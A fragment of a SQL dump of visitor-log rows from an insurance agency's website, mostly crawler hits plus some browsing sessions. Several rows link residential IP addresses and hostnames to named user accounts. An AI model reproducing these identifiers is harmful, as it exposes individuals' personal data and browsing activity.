+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2794,'0b_c6433515080230cd21aa55a43604c99c','1457564706','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2795,'0b_ca81ff6d3952729a75a063c71f1dce06','1457566074','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2798,'0b_6f43ff73751f235686b63643d2919f99','1457566078','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','0','0',0),(2800,'0b_6f43ff73751f235686b63643d2919f99','1457566099','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1600 x 900','','','','akepecs','','0','51',0),(2801,'0b_c283c5b5db885e1f0870b4dfe900c1ad','1457571664','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2804,'0b_9bc547f8af9a59a2d49c5ebe0a424bc4','1457571743','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2807,'0b_b98516755adccb4b069455d679b326b6','1457573181','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2809,'0b_b98516755adccb4b069455d679b326b6','1457573192','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2810,'0b_d3931aa909408c5e48d8a047ab958356','1457573269','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2813,'0b_dd9f74832e5f1f9f58ed3b7ccc92072b','1457573405','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2815,'0b_b6589787c854e278af8a8f1ce62b6a93','1457574860','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(2816,'0b_19e55963c20d8265f16fcf7e70840ef6','1457577285','178.159.250.170','ru101.activeby.net','/store/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com/store','',0,'WinXP','Chrome 5','us','','','','','','','3','0',0),(2818,'0b_108130c098e11d733f39ead3875c5faf','1457578033','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2821,'0b_3a814a862571cf484ca4e8dbe4b1778d','1457579056','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2824,'0b_d393910330830251d6c8340c8ae4bc43','1457580173','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2825,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580479','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/licensing-contracting/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','0',0),(2827,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580498','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/insentives/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2829,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580499','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','0',0),(2831,'0b_7900ea8da704b260fe254154157eb313','1457580599','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2833,'0b_0b3d20b0a661dd808a6fde2aab9d2799','1457580603','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2835,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580611','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2837,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580616','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/carriers/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2839,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580798','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/contact/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2841,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580806','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/about-us/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2843,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580820','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/contact/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2845,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580825','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/carriers/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2847,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580832','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/agent-tools/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2849,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580833','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','0',0),(2851,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580957','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2853,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580958','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','0',0),(2855,'0b_3ad4cb5e0029f06f565dac1d93720f6e','1457580990','100.38.95.208','pool-100-38-95-208.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','1600 x 900','','','','','','0','51',0),(2857,'0b_b98516755adccb4b069455d679b326b6','1457581187','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2859,'0b_b98516755adccb4b069455d679b326b6','1457581197','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2861,'0b_b98516755adccb4b069455d679b326b6','1457581210','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(2863,'0b_b98516755adccb4b069455d679b326b6','1457581224','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(2865,'0b_6d70032569d42ee643e7dae25c17332b','1457582008','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(2867,'0b_6d70032569d42ee643e7dae25c17332b','1457582010','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(2869,'0b_6d70032569d42ee643e7dae25c17332b','1457582016','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(2871,'0b_6d70032569d42ee643e7dae25c17332b','1457582031','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(2873,'0b_674524176e3d876beaf96c8580848732','1457582142','208.43.231.168,76.109.250.86','c-76-109-250-86.hsd1.fl.comcast.net','/','RoboForm/337.01 CFNetwork/758.2.8 Darwin/15.0.0','','',0,'','','us','','','RoboForm','','','','0','0',0),(2875,'0b_6d70032569d42ee643e7dae25c17332b','1457583774','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(2878,'0b_189e6c3a2cfb9d85b60815d9eeea6dc1','1457584278','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2881,'0b_11432cdbe44362cd75b887168d3d86c4','1457585440','192.227.204.139','192-227-204-139-host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(2884,'0b_1a721e3befe8d7a8d9a76863e9391a9d','1457589562','68.180.229.244','b115450.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(2887,'0b_1a721e3befe8d7a8d9a76863e9391a9d','1457589564','68.180.229.244','b115450.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(2890,'0b_5f7775a492e9d81f00c7b2992dbe1ff7','1457589569','68.180.230.57','b115405.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(2893,'0b_5f7775a492e9d81f00c7b2992dbe1ff7','1457589570','68.180.230.57','b115405.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(2896,'0b_c9600846ae735e644ad934dc58b3868b','1457589928','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2899,'0b_c9600846ae735e644ad934dc58b3868b','1457589935','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2902,'0b_c9600846ae735e644ad934dc58b3868b','1457589941','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2905,'0b_c9600846ae735e644ad934dc58b3868b','1457589948','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2908,'0b_c9600846ae735e644ad934dc58b3868b','1457589961','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2911,'0b_c9600846ae735e644ad934dc58b3868b','1457589967','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2914,'0b_c9600846ae735e644ad934dc58b3868b','1457589973','134.255.84.177','86ff54b1.dsl.pool.telekom.hu','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','hu','','','MJ12bot','','','','0','0',0),(2917,'0b_93564adda508fe4b334da7ab18207f49','1457593901','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(2920,'0b_044517003b90120eff4920394e1d8f1a','1457593990','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(2923,'0b_0b4bb21622ee7b5fe67c5fe454ba46be','1457594355','69.30.211.2','69.30.211.2','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(2926,'0b_0b4bb21622ee7b5fe67c5fe454ba46be','1457594369','69.30.211.2','69.30.211.2','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(2929,'0b_0b4bb21622ee7b5fe67c5fe454ba46be','1457594380','69.30.211.2','69.30.211.2','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(2932,'0b_d48437843e5a5750bc29ba5ddda93a45','1457596679','51.254.32.6','6.ip-51-254-32.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(2934,'0b_d48437843e5a5750bc29ba5ddda93a45','1457596682','51.254.32.6','6.ip-51-254-32.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(2937,'0b_d48437843e5a5750bc29ba5ddda93a45','1457596684','51.254.32.6','6.ip-51-254-32.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(2940,'0b_9c448712704416916e58c28ea4dbc7f0','1457598488','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(2941,'0b_9c448712704416916e58c28ea4dbc7f0','1457598490','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(2943,'0b_e86589f58ac028818aeba12f0b2af01d','1457599894','50.252.212.14','50-252-212-14-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com','',0,'Win7 x64','Firefox 43','gb','','','','','','','0','0',0),(2946,'0b_d53d7d8e7809135fb502661ab4efcb1b','1457600722','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2949,'0b_ba8b7292a7b76a9da5324561f9e548b9','1457601683','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2950,'0b_6ca8e00dda5b352e1ee9d373de1c60fa','1457602357','78.46.196.116','solus.fairnode.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(2953,'0b_6ca8e00dda5b352e1ee9d373de1c60fa','1457602359','78.46.196.116','solus.fairnode.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(2955,'0b_94b993193c891617d5264c6e04aad9d0','1457603307','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2958,'0b_5d0a2d01342a9fe71f1d1442e260de18','1457603477','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2961,'0b_8219b93d9fe439a8a03336c253fe44c9','1457604985','178.63.86.11','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(2962,'0b_8219b93d9fe439a8a03336c253fe44c9','1457604987','178.63.86.11','majestic12.co.uk','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(2964,'0b_8219b93d9fe439a8a03336c253fe44c9','1457604989','178.63.86.11','majestic12.co.uk','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(2967,'0b_8219b93d9fe439a8a03336c253fe44c9','1457604992','178.63.86.11','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(2968,'0b_9a2a1c5aa51fe6260a187d1d171ab995','1457605087','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2971,'0b_9a2a1c5aa51fe6260a187d1d171ab995','1457605089','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2974,'0b_0dcdcccfa0b9548ada0e5f9a9afa6d7b','1457607418','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2976,'0b_d89317c8216a5583196df4997fd1630f','1457608543','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2979,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609791','5.9.98.130','static.130.98.9.5.clients.your-server.de','/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2980,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609794','5.9.98.130','static.130.98.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2982,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609796','5.9.98.130','static.130.98.9.5.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2985,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609798','5.9.98.130','static.130.98.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2986,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609800','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2988,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609803','5.9.98.130','static.130.98.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2991,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609805','5.9.98.130','static.130.98.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2992,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609807','5.9.98.130','static.130.98.9.5.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2995,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609809','5.9.98.130','static.130.98.9.5.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2997,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609812','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(2998,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609814','5.9.98.130','static.130.98.9.5.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3000,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609819','5.9.98.130','static.130.98.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3003,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609821','5.9.98.130','static.130.98.9.5.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3004,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609823','5.9.98.130','static.130.98.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3006,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609826','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(3007,'0b_4c0fc6a7b41095e44d8f53c24009e08a','1457609828','5.9.98.130','static.130.98.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; 